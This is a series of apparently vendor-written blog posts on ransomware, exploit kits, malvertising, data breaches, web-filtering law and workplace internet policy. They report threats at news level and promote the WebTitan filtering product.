While implementing controls to prevent RDP brute force attacks is vital, most ransomware variants are spread via spam email, and to a lesser extent via exploit kits and drive-by downloads. Comprehensive security defenses must therefore be deployed to reduce the risk of ransomware attacks.
These should include an advanced spam filtering solution to prevent malicious emails from being delivered, web filters to block malicious websites and drive-by downloads, end user training to raise awareness of the threat from ransomware and other forms of malware, and network monitoring technology to identify unusual server and endpoint activity.
Network activity monitoring will not prevent ransomware attacks, but it will help IT teams respond quickly and halt the spread of ransomware to other vulnerable servers and end points.
The Magnitude exploit kit is being used to deliver a new malware variant – Magniber ransomware. While the Magnitude EK has been used in attacks throughout the Asia Pacific region, the latest attacks are solely taking place in South Korea.
Ransomware and malware attacks in Europe and the Americas are primarily conducted via spam email. Exploit kits having fallen out of favor with cybercriminals over the past year. However, that is not the case in the Asia Pacific region, where exploit kit attacks are still common.
An exploit kit is a website toolkit that scans visitors’ browsers for exploitable vulnerabilities. When a vulnerability is identified, it is exploited to download malware onto the user’s system. The download occurs silently and in the case of a ransomware attack, the user is only likely to discover the attack when their files have been encrypted.
Magniber ransomware takes its name from the Magnitude EK and Cerber ransomware, the ransomware variant that it has replaced. At present, Magniber ransomware is solely targeting users in South Korea. If the operating system is not in Korean, the ransomware will not execute. While it is not unusual for ransomware campaigns to involve some targeting, it is rare for attacks to be targeted on a specific country.
Up until recently, the Magnitude exploit kit was being used to download Cerber ransomware. FireEye reports that those attacks were concentrated in the Asia Pacific region. 53% of attacks occurred in South Korea, followed by the USA (12%), Hong Kong (10%), Taiwan (10%), Japan (9%), and Malaysia (5%). Small numbers of attacks also occurred in Singapore and the Philippines. At the end of September, Magnitude EK activity fell to zero, but on October 15, the payload was updated and attacks were solely conducted in South Korea.
To avoid analysis, Magniber ransomware checks whether it is running in a virtual environment. A check is also performed to identify the system language. If the system language is Korean, data is encrypted with AES128 and encrypted files are given the .ihsdj extension. After encryption, the ransomware deletes itself. If the system language is not Korean, the ransomware exists.
At present, the Magnitude Exploit Kit has been loaded with a single exploit for CVE-2016-0189 – A memory corruption vulnerability in Internet Explorer. A patch for the vulnerability was released last year. FireEye believes the ransomware is still under development and its capabilities will be enhanced and finetuned.
To prevent attacks, it is important to ensure systems are fully patched. Businesses should make sure all network nodes are updated and are fully patched. A web filtering solution should also be used as an additional protection against this and other exploit kit attacks.
The EU’s proposed Internet copyright filter has not proven popular with digital rights groups. The Internet copyright filter provision, detailed in Article 13 of the Digital Single Market proposals, would require the Internet to be policed to prevent the online publication of copyrighted content.
At present, if an individual decides to share content online and that material is protected by copyright, the holder of the copyright can submit a request to have the material taken down. The process can take some time before the material is removed, during which time the information can be viewed and potentially downloaded.
The proposed Internet copyright filter would improve protections for copyright holders. Online service providers such as Facebook, Twitter, WordPress, YouTube, and Dropbox would be required to constantly scan uploaded content to check the material is not protected by copyright. If it is, the content would need to be removed immediately.
The Internet copyright filter would certainly go some way toward protecting the rights of copyright holders and would make it harder for music, movies, TV shows, and other video content to be uploaded and viewed by the public. Unsurprisingly, the proposed measure has attracted considerable support from the entertainment industry.
However, there has been considerable opposition to the proposed Internet copyright filter by digital rights groups such as the Electronic Frontier Foundation, Human Rights Watch, Reporters Without Borders, Open Rights Group, European Digital Rights and the Civil Liberties Union for Europe. In total, 56 organizations have added their name to an open letter to EU policymakers calling for Article 13 to be dropped.
Those organizations believe that while there are benefits to Article 13, the Internet copyright filter would be impossible to implement without also violating the freedom of expression detailed in Article 11 of the Charter of Fundamental Rights, as well as imposing excessive restrictions on citizens’ fundamental rights.
If passed, Internet companies would be forced to take down content to avoid possible legal liability, and that would undoubtedly see them erring on the side of caution and applying excessive filtering controls. Legitimate content would be deleted and Internet filtering controls would limit freedom to impart and receive information. Further, it would be difficult in practice to differentiate illegal uploads of content that violate copyright laws from legitimate uses of content.
Whether the letter will result in Article 13 being dropped remains to be seen, but if not, there are likely to be further challenges. As is mentioned in the letter, previous attempts to introduce new laws that conflict with the Charter of Fundamental Rights have been rejected by the Court of Justice. If those precedents are followed, Article 13 would likely be rendered invalid.
A Social Community Partnership employee fired for viewing pornography at work took legal action against her employer for unfair dismissal. However, Ireland’s Workplace Relations Commission (WRC) has upheld the Partnership’s decision to fire the employee, confirming the sanction was appropriate.
In May 2016, the employee was discovered to have viewed pornography on her work computer and was promptly fired for gross misconduct. While the employee denied viewing pornography at work, a review of access logs on her computer revealed pornographic websites had been accessed on seven occasions between September and November 2015.
The material accessed included depictions of rape and the abduction of girls. While viewing pornography at work is unacceptable in any office, the nature of the material that was accessed made this an egregious violation of the Partnership’s acceptable Internet usage policy, especially considering the Social Community Partnership works to support children and families.
Lack of Individual Logins Makes it Difficult to Attribute Inappropriate Internet Access to Individual Employees
The case was not clear cut, as the computers in the reception area where she worked did not require secure logins for each employee. The employee also denied that she had viewed pornography and claimed two other workers used the same computers. She also said that other employees could have used the computers when she was not at her desk.
To determine that the employee was the person responsible for violating the company’s acceptable Internet use policy, the Partnership had to compare Internet logs against the work schedule. Multiple employees were found to have been working on four of the seven occasions, but the employee was the only person scheduled to work in the reception area on three of the occasions when pornography was accessed.
The employee suggested the sites could have been popups, although the claim was rejected by her employer. To determine whether access was due to a malware infection, an external computer expert was called in to conduct a scan of the computer. The scan confirmed no malware was present that could have redirected the browser to pornographic websites.
After hearing the unfair dismissal case and the evidence against the employee, the WRC ruled that ‘on the balance of probability,’ the employee was the person responsible for accessing the material and that, under the circumstances, the decision to fire the employee was correct.
Two Thirds of Men and One Third of Women Admit to Viewing Pornography at Work
Even though viewing pornography at work is prohibited in many organizations, employees ignore company rules and access obscene material on their work computers. The actions often result in instant dismissal when they are discovered, although many employees believe they won’t be caught or do not realize Internet logs are maintained. Many choose to anonymize their Internet activity by connecting to the Internet via VPNs and other anonymizing services.
The scale of the problem has been identified by several surveys and studies. In one notable study, conducted by Proven Men Ministries in 2014, 63% of men and 36% of women admitted having accessed pornography at work on at least one occasion. Other studies in the United States and the UK have also confirmed viewing pornography at work is commonplace.
The viewing of pornography at work can cause many problems for employers. In this case, the Social Community Partnership could have lost essential government funding. Even though that didn’t happen, there has been considerable negative publicity and the expense of fighting an unfair dismissal claim.
When employees view pornography at work it can easily lead to the creation of a hostile working environment, lawsuits could be filed by other employees who have been made to feel uncomfortable by the actions of others, and when illegal pornographic material is accessed at work – child pornography for example – the consequences for employers can be severe.
How Can Businesses Prevent Employees Viewing Pornography at Work?
Acceptable Internet usage policies can be used to ensure employees who breach the rules can be fired, but they do not prevent employees viewing pornography at work. Cases such as this show just how important it is to implement technology to prevent employees from accessing inappropriate website content – not just pornography, but also other content that should not be accessed in the workplace.
The expense and problems experienced by the Social Community Partnership could have easily been avoided if a web filter had been used. A web filter is a simple method of enforcing acceptable Internet usage policies and preventing pornography and other unacceptable content from being accessed by employees. A web filter can also block the use of anonymizers such as VPNs.
Further, a web filter is easy to implement, inexpensive, and can help organizations prevent considerable productivity losses, while reducing legal liability.
To find out more about the benefits of web filtering, and how you can stop employees viewing pornography at work, contact the TitanHQ team today and ask about WebTitan.
A massive Pornhub malvertising campaign has been detected that potentially resulted in millions of malware infections in the United States, Canada, UK, Australia and beyond.
Malvertising is the term given to malicious adverts that dupe website visitors into visiting websites where malware is downloaded or to sites that are used to phish for login credentials. These malverts often appear on legitimate websites, adding to their legitimacy. The malicious sites that users are directed to can download any type of malware – keyloggers, ransomware, spyware or adware.
The Pornhub malvertising campaign was used to spread click fraud malware. The hacking group behind the campaign – KovCoreG – used the Kovter Trojan. The malware has persistence and will survive a reboot.
Pornhub is one of the most popular adult websites, attracting millions of visitors. The website uses a third-party ad network called Traffic Junky. The attackers managed to sneak their malicious adverts past the controls the ad network has in place against malvertising.
The attackers detected the browser being used and redirected users to a website tailored to their browser. The Pornhub malvertising campaign worked on users of Chrome, Internet Explorer/Edge and Firefox. The webpages, which had been expertly crafted to exactly match the colors and fonts of Google, Firefox, and Microsoft and included the relevant logos and branding. The malicious webpages indicated a critical security update was required to secure the user’s browser. Clicking to download the update, and running that update, would result in infection.
The Pornhub malvertising campaign was detected by Proofpoint, which notified the ad network and Pornhub. Both acted quickly to remediate the threat, although not before many users had been infected with malware.
A Web Filtering Solution Can Block Malvertising Attacks
Implementing a web filtering solution in the workplace is not just about preventing your employees from wasting time on Facebook. A web filter is an important part of any layered cybersecurity defense strategy. The latest Pornhub malvertising campaign is a good example of how controlling the websites your employees can access can prevent malware infections.
Unless you work in the adult entertainment industry, employees should be prevented from accessing pornography at work. Most organizations include pornography in their acceptable usage policies. However, unless a filtering solution is implemented to block access, some employees are likely to break the rules. You could have a policy in place that states accessing pornography at work will result in instant dismissal. However, if anyone breaks the rules, it is not just their job that is on the line. Your network could be infected with malware.
Of course, cybercriminals do not just use adult websites for malicious adverts. Malvertising can appear on any website that includes ad blocks from third party advertisers. Since these ad blocks are an important source of revenue, many popular websites use them – Websites that are likely to feature heavily in your Internet access logs. The New York Times website for example, or the BBC and MSN.
This Pornhub malvertising campaign required a manual download, although oftentimes users are directed to sites where malware is downloaded automatically using exploit kits. If you are fully patched, you are likely to avoid an infection, but it is easy to miss a patch. The massive Equifax data breach showed how easy it is for a patch to be missed, as did the Wannacry ransomware attacks.
Considering the cost of resolving a malware infection, phishing attack, or ransomware installation, a web filtering solution is likely to pay for itself. Add to that the increase in productivity from blocking access to certain categories of websites and the improvements to your profits can be considerable.
If you are not yet using a web filter, or are unhappy with the cost of your current solution, give TitanHQ a call today and find out more about the savings you could be making.
The cost of cybercrime is 23% higher than last year, according to a new study conducted by the Ponemon Institute on behalf of Accenture. The average annual cost of cybercrime is now $11.7 million per organization, having increased from $9.5 million last year.
The Ponemon Institute conducted the 2017 Cost of Cybercrime study on 2,182 security and IT professionals at 254 organizations. Respondents were asked about the number of security breaches they experienced in the past 12 months, the severity of those incidents, and the cost of mitigation.
The average number of security breaches experienced by each organization was 130 per year, which is more than twice the number of incidents that were being experienced 5 years ago and 27.4% more than this time last year.
The costs of cybercrime were split into four areas: Disruption to businesses processes, data loss, loss of revenue, and damage to equipment. Respondents were asked to rate each based on their cost. While the losses from disruption to the business were not insignificant, they were the least costly. The biggest cost was information loss.
The costliest security incidents to resolve were malware attacks, which cost an average of $2.4 million to resolve, although the attacks were considerably more expensive to resolve in the United States where the average losses were $3.82 million per incident. In second place was web-based attacks, costing an average of $2 million globally and $3.4 million in the United States.
However, in terms of the amount of disruption caused, insider incidents topped the list, taking an average of 50 days to mitigate. Ransomware attacks took an average of 23 days to resolve.
The cost of cybercrime report indicates organizations in the financial services have the highest annual costs, spending an average of $18.28 million per organization. In second place was the energy sector with an average annual cost of $17.20 million.
Organizations in the United States had the biggest annual security breach resolution costs, spending an average of $21 million each per year. Bottom of the list was Australia with average annual costs of $5 million. Organizations in the United Kingdom were spending an average of $8.7 million per year.
As we saw with the NotPetya attacks, the cost of a cyberattack can be considerably higher. Both Maersk and FedEx reported their losses from the attacks could well rise to $300 million.
The most valuable security tools were seen as threat intelligence solutions, which gather data from cyberattacks around the world and allow businesses to prioritize threats. These solutions saved businesses an average of $2.8 million per year.
Email may be the primary vector used in phishing attacks, but the second quarter of 2017 has seen a massive increase in malvertising phishing attacks.
Malvertising is the term given to malicious adverts, which are often displayed on high-traffic websites via third party advertising networks. These adverts are used to direct web visitors to malicious websites, oftentimes sites containing exploit kits that probe for vulnerabilities and silently download ransomware and other malware.
These malware attacks increased between 2015 and 2016, with the total number of malvertising attacks rising by 136%. Demonstrating how quickly the threat landscape changes, between Q1 and Q2, 2017 there was a noticeable decline in malicious advert-related exploit kit and malware attacks. Exploit kit redirects fell by 24% and malware-related adverts fell by almost 43%, according to a recent study released by RiskIQ.
However, the study shows there was a massive increase in malvertising phishing attacks with cybercriminals changing their tactics. Phishing-related adds increased by 131% in Q2, 2017, but between 2015 and 2016, malvertising phishing attacks increased by a staggering 1,978%.
The websites that these adverts direct users to often promise a free gift in exchange for taking part in a survey. Genuine market research firms tend not to offer large incentives for taking part in surveys, or when they do offer an incentive, participants are entered into a draw where they stand a chance of winning a prize. When gifts are offered, to all participants it is a warning sign that all may not be as it seems. That said, many people still fall for the scams.
The aim of the surveys is to obtain sensitive information such as bank account information, Social Security numbers, usernames, passwords and personal information. The information can be used for a wide range of nefarious purposes. It is not only personal information that is sought. Cybercriminals are keen to gain access to corporate email accounts for the data they contain and to use them to send phishing emails.
When phishing attacks occur through corporate email accounts it can seriously tarnish a company’s reputation and may result in litigation if insufficient controls have been implemented to prevent such attacks from occurring.
Businesses can protect against malicious adverts and websites by implementing a web filter. A web filter can be configured to block third party adverts as well as the malicious websites that users are directed to, thus minimizing the risk of web-based malware and phishing attacks.
Many businesses are now choosing to filter the website content that their employees access purely for security reasons, although there are many other benefits to be gained from content filtering. Web filters can help employers curb cyberslacking, control bandwidth usage, and reduce legal liability.
With the cost of DNS-based content filtering low and potentially high losses from the failure to control Internet access, it is no surprise that so many businesses are now choosing to regulate what employees can do online at work.
To find out more about the full range of benefits of web filtering and to take advantage of a free trial of WebTitan, the leading web filtering solution for businesses, contact the TitanHQ today.
Why should businesses invest heavily in technology to detect ransomware attacks when a ransom payment may only be between $500 and $1,000? While that is what cybercriminals are charging as a ransom, the cost of a ransomware attack is far higher than any ransom payment. In fact, the ransom is often one of the lowest costs of a ransomware attack that businesses must cover.
The ransom payment may seem relatively small, although the latest ransomware variants are capable of spreading laterally, infecting multiple computers, servers and encrypting network shares. The ransom payment is multiplied by the number of devices that have been infected.
The Cost of a Ransomware Attack Can Run to Millions of Dollars
When businesses suffer ransomware attacks, the attackers often set their ransoms based on the perceived ability of the organization to pay. In 2016, Hollywood Presbyterian Medical Center was forced to pay a ransom of $19,000 to unlock its infection. When the San Francisco Muni was infected, hackers demanded $50,000 for the keys to unlock its payment system. In June 2017, South Korean web host Nayana agreed to pay $1 million for the keys to unlock the encryption of its 53 Linux servers and 3,400 customer websites.
These ransom payments are high, but the ransom is only one cost of a ransowmare attack. The biggest cost of a ransomware attack is often the disruption to business services while files are taken out of action. Systems can be taken out of action for several days, bringing revenue generating activities to an abrupt stop. One Providence law firm experienced downtime of three months following a ransomware attack, even though the $25,000 ransom was paid. Lawyers were stopped from working, causing a loss in billings of an estimated $700,000.
In heavily regulated industries, notifications must be sent to all individuals whose information has been encrypted, and credit monitoring and identity theft services often need to be provided. When hundreds of thousands of users’ data is encrypted, the cost of printing and mailing notifications and paying for credit monitoring services is substantial.
Once an attack has been resolved, networks need to be analyzed to determine whether any other malware has been installed or backdoors created. Cybersecurity experts usually need to be brought in to conduct forensic analyses. Then ransomware defenses need to be improved and new security systems purchased. The total cost of a ransomware attack can extend to hundreds of thousands or millions of dollars.
Ransomware is Here to Stay
As long as ransomware attacks are profitable, the threat will not go away. The use of ransomware-as-a-service allows ransomware developers to concentrate on creating even more sophisticated ransomware variants and stay one step ahead of security researchers and antivirus companies.
Anonymous payment methods make it hard for law enforcement to discover the identities of ransomware developers, and since those individuals are usually based overseas, even if they are identified, bringing them to justice is problematic.
Ransomware developers are constantly changing tactics and are developing new methods of attack. The coming months and years are likely to see major changes to how ransomware is used, and the systems that are attacked.
Ransomware attacks mostly target Windows systems, although new variants have already been developed to encrypt Mac and Linux files. Security experts predict there will also be an increase in ransomware variants targeting Macs as Apple’s market share increases, while website attacks are becoming more common. When a website is attacked, all site files, pages, and images are encrypted to prevent access. For an e-commerce business, the attacks can be devastating.
Ransomware attacks on mobile devices are now commonplace, with screen-lockers and file-encryptors used. Screen locking ransomware prevents users from accessing any apps or functions rendering the device unusable. File encrypting variants encrypt all data stored on the device. These ransomware variants are most commonly packaged with apps sold in unofficial app stores. Risk can be substantially reduced by only downloading files from official app stores and ensuring all apps are kept up to date.
Given the increase in attacks and the massive increase in new ransomware variants, businesses must improve their defenses, block the common attack vectors, backup all data, and constantly monitor for indicators of compromise.
Tips for Preventing a Ransomware Attack
- Ensure users only have access to data and network drives necessary for them to perform their jobs.
- Backup devices should be disconnected when backups have been performed.
- Keep operating systems, software applications, and plugins up to date and fully patched.
- Block access to websites known to host exploit kits using a web filter such as WebTitan.
- Implement a spam filtering solution to prevent malicious emails from reaching inboxes.
- Provide regular, ongoing training to all staff on the risks of ransomware and phishing.
- Segment your network and restrict administrator rights.
To ensure a swift recovery from a ransomware attack, make sure you:
- Create multiple backups of all files, websites, and systems.
- Create three backups on two different media and store one copy offsite.
- Develop a ransomware response plan that can be implemented immediately when an attack is suspected.
A massive Equifax data breach was announced yesterday, which ranks as one of the largest data breaches of 2017. Approximately 143 million consumers have been impacted and had their sensitive data exposed and potentially stolen.
A data breach at any company can cause considerable fallout, although this incident is particularly bad news for a credit reporting agency. Equifax aggregates and stores vast quantities of highly sensitive consumer data that are used by financial firms to make decisions about the creditworthiness of consumers. The data breach is sure to damage trust in the company.
Ironically, Equifax offers credit monitoring and identity theft protection services to companies that experience data breaches to help them protect breach victims. Naturally, all Americans affected by the Equifax data breach will be offered those services free of charge. In fact, Equifax has gone further by agreeing to offer those services free of charge to all U.S. consumers for a period of one year, even if they were not directed affected by the breach.
Chairman and Chief Executive Officer, Richard F. Smith, said “This is clearly a disappointing event for our company, and one that strikes at the heart of who we are and what we do. I apologize to consumers and our business customers for the concern and frustration this causes.”
The Equifax data breach may not be the largest data breach of 2017, but the nature of the datya exposed make it one of the most serious. Highly sensitive data were exposed, including personal information, Social Security numbers, birthdates, driver’s license numbers, and 209,000 consumers had their credit card numbers exposed.
These are the exact types of information used by cybercriminals to commit identity theft and fraud. Dispute documents were also stored on the compromised system. Those documents contained a range of personal information of 182,000 consumers. The bulk of the data related to U.S citizens, although some consumers in Canada and the United Kingdom have also been affected by the Equifax data breach.
The hacker(s) responsible for the attack had access to Equifax’s systems for a considerable period of time before the breach was discovered. Access was first gained to systems in mid-May and continued until July 29, 2017 when the breach was discovered.
According to a statement released by Equifax yesterday, hackers gained access to its systems by exploiting a website vulnerability. While sensitive data were exposed and potentially stolen, Equifax reports that its core databases that are used for credit referencing purposes, were not compromised at any point.
The data breach is still being investigated and a third-party cybersecurity firm has been hired to assist with the investigation. Smith said, “I’ve told our entire team that our goal can’t be simply to fix the problem and move on. Confronting cybersecurity risks is a daily fight. While we’ve made significant investments in data security, we recognize we must do more. And we will.”
Breach notification letters are being sent to some, but not all, breach victims. Only the 391,000 individuals whose credit card numbers or dispute documents were exposed will receive notifications by mail. All other individuals will have to check an online tool to find out if their information was exposed in the breach.
Earlier this year, the NeutrinoPOS banking Trojan source code was leaked, leading to several new variants of malware being created, the latest being Jimmy Nukebot. In contrast to its predecessor, which was used to steal bank card information, the latest version has lost that functionality.
However, Jimmy Nukebot can perform a wide range of malicious functions, serving as a downloader for a wide range of malicious payloads. The malware also acts as a backdoor which will allow the actors behind the new malware to monitor activity an infected device.
Security researchers at Kaspersky Lab have analysed Jimmy Nukebot infections and have seen the malware download a wide range of modules including Monero cryptocurrency mining malware, web-injects similar to those used in NeutrinoPOS, and various other modules that modify the functions of the malware. The malware can take screenshots of an infected device and exfiltrate data and could download any malicious payload onto an infected device.
Publication of the source code of malware results in an increase in its popularity. With the malware used in more attacks, the probability of it being detected is much higher. In order to evade detection, considerable modification to the malware is required. This could well be the reason why so many changes have been made to the latest iteration. The authors of Jimmy Nukebot took the original source code of the NeutrinoPOS banking Trojan and totally restructured the malware. The way the new malware has been constructed also makes static analysis much more complicated.
The new features of the malware make it a formidable threat. Jimmy Nukebot is able to learn about the system on which it is installed and use that information for exploitation, tailoring the payload it delivers based on its environment rather than performing a pre-set malicious activity immediately upon infection.
Since the malware passively collects information and responds accordingly, it is unlikely to trigger AV alerts and may remain undetected. Organizations that have the malware installed are therefore unlikely to be aware that their systems have been compromised.
Protecting against threats such as this requires advanced malware defences, although as with most malware infections, they occur as a result of the actions of end users such as opening infected email attachments, clicking hyperlinks in emails or visiting websites that silently download malware.
Improving security awareness of employees will go a long way toward preventing malware from being installed. Coupled with an advanced spam filter to block email-based threats, a web filter to block redirects to exploit kits, regular patching, the enforced use of strong passwords, and advanced anti-malware technology, organisations can protect themselves against malware threats.
Downloading apps from non-official sources potentially places users at risk, but Google Play Store malware infected apps do exist. Google has controls in place to prevent malicious apps from being uploaded to its app store, but those controls are not always 100% effective. Choosing to download apps only from official stores is no guarantee that the apps will be free from malware.
Security researchers recently discovered around 300 apps offered through the Google Play store that appear to be legitimate programs, yet are infected with malware that add infected devices to a large botnet. The botnet was being used to launch distributed denial of service attacks (DDoS) on websites.
The botnet, dubbed WireX, comprises of tens of thousands of Android devices that are being used in highly damaging cyberattacks. Devices started to be infected in early July, with a steady rise in additions over the following weeks. Even though numbers of compromised devices grew steadily in July, the botnet was only discovered in early August when the WireX botnet started to be used in small scale DDoS attacks.
Since then, larger attacks have taken place, mostly targeting the hospitality sector. Those attacks have clogged websites with junk traffic preventing legitimate users from accessing the sites. Some of WireX DDoS attacks involved as many as 160,000 unique IPs. Since devices could conceivably be used to attack websites with multiple addresses, the size of the botnet has been estimated to be around 70,000 devices.
The growth of the botnet was soon attributed to malicious apps, with researchers discovering around 300 Google Play Store malware infected apps. Google has now disabled those apps and is in the process of removing them from devices.
The apps included video players, battery boosters, file managers and ringtones. The apps were not simply malware, as users would undoubtedly attempt to delete the apps if they failed to perform their advertised functions. The apps all worked and users who downloaded the apps were unaware that their devices were being used for malicious purposes. The malware used a ‘headless browser’ which was able to perform the functions of a standard browser, without displaying any information to the user allowing the actors behind the malware to operate undetected.
When the devices were needed for DDoS attacks, they would receive commands from their C2 server to attack specific websites.
Multiple security vendors including Akamai, RiskIQ, Flashpoint and Cloudflare collaborated and succeeded in taking down the WireX botnet. Without that collaboration, the botnet would still be active today and may not have been detected.
The Neptune Exploit kit is being used to turn computers into cryptocurrency miners, with traffic directed to the exploit kit using a hiking-themed malvertising campaign.
Exploit kit activity has fallen this year, although these web-based attacks still pose a significant threat. Exploit kits are web-based toolkits that probe browsers and plugins for vulnerabilities that can be exploited to download malware. Simply visiting a website hosting an exploit kit is all it takes for malware to be silently downloaded.
Protecting against exploit kit attacks requires browsers, plugins and extensions to be kept 100% up to date. However, even updated browsers can be vulnerable. Exploit kits can also include exploits for zero-day vulnerabilities that have not yet been patched.
Acceptable usage policies can help organizations to prevent exploit kit attacks, although website visitors are often redirected to malicious sites from legitimate websites. One of the main ways this happens is the use of malvetisements. Many high traffic websites include advertising blocks that display third-party adverts. The advertising networks serve adverts which are displayed on member sites, with the site owners earning money from ad impressions and click throughs.
While the advertising networks have measures in place to vet advertisers, oftentimes cybercriminals succeed in submitting malicious adverts. Those adverts are then pushed out and displayed on legitimate websites. Clicking one of those malicious adverts will see the user directed to a webpage hosting the exploit kit.
Exploit kits are used to download Trojans, ransomware and other malicious code, although the Neptune exploit kit is being used to download cryptocurrency miners. Infection will see computers’ processing power used to mine the Monero cryptocurrency. Infection will result in the infected computer’s resources being hogged, slowing down the performance of the machine.
The latest Neptune exploit kit campaign uses hiking club-related adverts to drive traffic to landing pages hosting the Neptune exploit kit, which in turn uses HTML and Flash exploits to download malware. These adverts closely mimic genuine domains. FireEye reports that one such campaign mimics the genuine website highspirittreks[.]com using the domain highspirittreks[.]club. Other campaigns offer a service to convert Youtube videos to MP3 files. The imageryused in the adverts is professional and the malvertising campaigns are likely to fool many web surfers.
The exploits used in the latest campaign are all old, therefore, protecting against attacks simply requires plugins and browsers to be updated. The main exploits take advantage of flaws in Internet Explorer – CVE-2016-0189, CVE-2015-2419, CVE-2014-6332 – and Adobe Flash – CVE-2015-8651, CVE-2015-7645.
Having a computer turned into a cryptocurrency miner may not be the worst attack scenario, although exploit kits can rapidly switch their payload. Other exploit kits are being used to deliver far more damaging malware, which will be downloaded silently without the user’s knowledge. Consequently, organizations should take precautions.
In addition to prompt patching and updating of software, organizations can improve their defences against exploit kits by implementing a web filtering solution such as WebTitan.
WebTitan can be configured to block all known malicious sites where drive-by downloads take place and can prevent malvertisements from directing end users to webpages hosting these malicious toolkits.
To find out more about WebTitan and how it can improve your organization’s security posture, contact the TitanHQ team today.
India’s Central Board of Secondary Education is urging all CBSE affiliated schools to take action to improve safety for students, including implementing school web filtering technology to keep students safe online.
The Internet is home to an extensive range of potentially harmful material that can have a major impact on young developing minds. Parents can take action to keep their children safe at home by using parental control filters. However, students must receive similar or greater levels of protection while at school.
School web filtering technology can prevent students from deliberately or accidentally viewing obscene material such as pornography, child pornography or images of child abuse and other categories of potentially harmful website content. CBSE has warned school boards that when students access this material it is “detrimental to themselves, their peers and the value system.” School web filtering technology should also be implemented to prevent students from engaging in illegal activities online via school IT devices.
CBSE affiliates schools have been advised to develop guidelines for safe Internet use and make this information available to students and display the rules prominently. However, without school web filtering technology, these policies would be easy to ignore. A technological solution ensures students wishing to engage in illegal activities online, or view harmful website content, will be prevented from doing so.
Prevention is only one aspect of Internet control. Schools should also set up a monitoring system to discover when individuals are attempting to bypass Internet usage policies. A web filtering solution should therefore have the capability to generate reports of attempted accessing of prohibited material to allow schools to take action. Schools have also been advised to sensitise parents about safety norms and even go as far as suggesting disciplinary action be taken when children are discovered to have attempted to access inappropriate material.
While many school systems around the world have implemented school web filtering technology, CBSE is advising affiliated schools in India to go one step further and restrict Internet content by age groups. Schools should set filtering controls by user groups and restrict access to age-inappropriate websites. Web filtering solutions such as WebTitan allows controls to be easily set for different user groups. The solution can be used to set separate filtering controls for staff and students of differing ages with ease.
Other Internet controls that have been suggested include the rapid blocking usernames/passwords when children leave school, using antivirus solutions to reduce the risk of malware infections, using firewalls to prevent cyberattacks and the theft of children’s sensitive information, and for staff to avoid posting images and videos of their students online.
School Web Filtering Technology from TitanHQ
The benefits of implementing school web filtering technology are clear, but choosing the most cost-effective controls can be a challenge.
Appliance based web filters involve a significant initial cost, there is ongoing maintenance to consider, the need for on-site IT support in many cases, and as the number of Internet users increases, hardware upgrades may be necessary.
TitanHQ offers a more cost-effective and easy to manage solution – The 100% cloud-based web filter, WebTitan.
WebTitan Cloud and WebTitan Cloud for WiFi makes filtering the internet a quick and easy process. There is no need for any hardware purchases or software installations. To start filtering the Internet and protecting students from harmful web content, all that is required is to point your DNS to WebTitan. Once that simple change has been made you can be filtering the Internet in minutes.
Both solutions can be easily configured to block different categories of website content, such as pornography, file sharing websites, gambling and gaming websites and other undesirable website content. The solutions support blacklists, allowing phishing and malware-infected sites to be easily blocked along with all webpages identified by the Internet Watch Foundation as containing images of child abuse and child pornography.
These powerful web filtering solutions require no software updates or patching. All updates are handled by TitanHQ. Once acceptable Internet usage policies have been set via the intuitive web-based control panel, maintenance only requires occasional updates such as adding legitimate webpages to whitelists. Even blacklists are updated automatically.
If you are keen to implement school web filtering technology for the first time or are unhappy with your current provider, contact the TitanHQ team today and register for your no-obligation free trail and see the benefits of WebTitan for yourself before making a decision about a purchase.
Internet filtering laws in the United States are mostly introduced at the state level, although federal legislation has been introduced for schools and libraries – The Children’s Internet Protection Act (CIPA).
Typically, Internet filtering laws in the United States are concerned with protecting minors. Laws apply to schools and libraries, although some states also require publicly funded institutions to apply controls to block the accessing of pornography, obscene and other harmful material by minors.
However, legislation is now being considered to force vendors or suppliers of Internet-enabled devices to implement Internet filtering technology by default. The aim is not to prevent adults from accessing pornographic material on their personal devices, only to ensure that there are some controls in place. That means all vendors/suppliers of Internet-enabled devices will be required to implement a web filtering control, with the new device owners required to opt in if they wish to view pornography. Opting in must be done in writing and requires proof of age.
Consumers will also be required to pay a fee to have the Internet filtering software removed. In South Carolina, legislation has been proposed that would require consumers to pay $20 to have the pornography block removed. The legislation was filed with the South Carolina General Assembly in December 2016. Similar legislation was also proposed in Utah in 2016.
Federal Internet Filtering Laws in the United States
At the federal level, all schools and libraries are required to comply with CIPA and implement web filters to prevent minors from accessing obscene material, pornographic images, images of child abuse, and other potentially harmful material if they wish to apply for discounts under the E-rate program or accept Library Services and Technology Act grants. If organizations choose not to apply for those grants or receive E-rate discounts, Internet filtering laws in the United States do not apply, at least at the federal level.
State-Level Legislation on Internet Controls
Internet filtering laws in the United States are applied at the state level and usually concern K12 schools and public libraries. Not all states require Internet filters to be applied. Some only require policies to be introduced to restrict access.
Individual states that have introduced legislation requiring schools and libraries to implement web filters or policies to control the content that can be accessed by minors are summarized in the table below. Since state laws often change, it is strongly advisable to consult your state department for updates to state legislation.
When policies are required to control access, schools and libraries may prefer to use a software or cloud-based solution to provide a greater level of protection. State laws are only concerned with ensuring the minimum level of Internet safety for minors when venturing online.
Quick Reference Guide Detailing U.S. States with Internet Filtering Laws (2017)
||Yes (Technology or policies)
||Yes (Policies and Technology)
||Yes (Policies or Technology)
||No (Policies or Technology)
||No (Under evaluation)
||Yes (Policies or Technology)
||Yes (Policies or Technology)
* Libraries that apply for and receive funding through the Enrich Iowa Program
** Public libraries receiving state funding must also apply filtering controls to prevent adults from accessing obscene material including child pornography.
*** Home schooled students must also be provided with a filtering device or service
The following states have introduced legislation that requires Internet service providers to offer web filtering services to allow state residents to protect children from accessing potential harmful website content
Internet filtering laws in the United States are subject to change. The Internet filtering laws in the United States detailed on this page are for information purposes only. Schools and libraries should consult their state/education departments for details of the laws that apply in their state.
Law firm hacking incidents are up and recent attacks have shown cybersecurity best practices for law firms are not being adhered to. Unless cybersecurity defenses are improved, it is too easy for hackers to gain access to sensitive data.
Cybercriminals have their sights firmly set on lawyers, or more specifically, the treasure trove of highly sensitive data stored on their computers and networks. Data that in the wrong hands could be used for blackmail.
Clients share highly sensitive information with their legal teams. Lawyers store company secrets, employment contracts and PII, banking details, financial projections, medical records, and naturally information about current and future lawsuits. All of this information is highly valuable to hackers and can be used for blackmail, sold to competitors, or used for all manner of nefarious purposes. It is therefore no surprise that hackers want to attack law firms and that they are increasingly doing just that.
Cyberattacks are not only about stealing data. It can also be lucrative to prevent lawyers from gaining access to their clients’ files. Ransomware attacks on law firms can result in sizable payments for the keys to unlock the encryption.
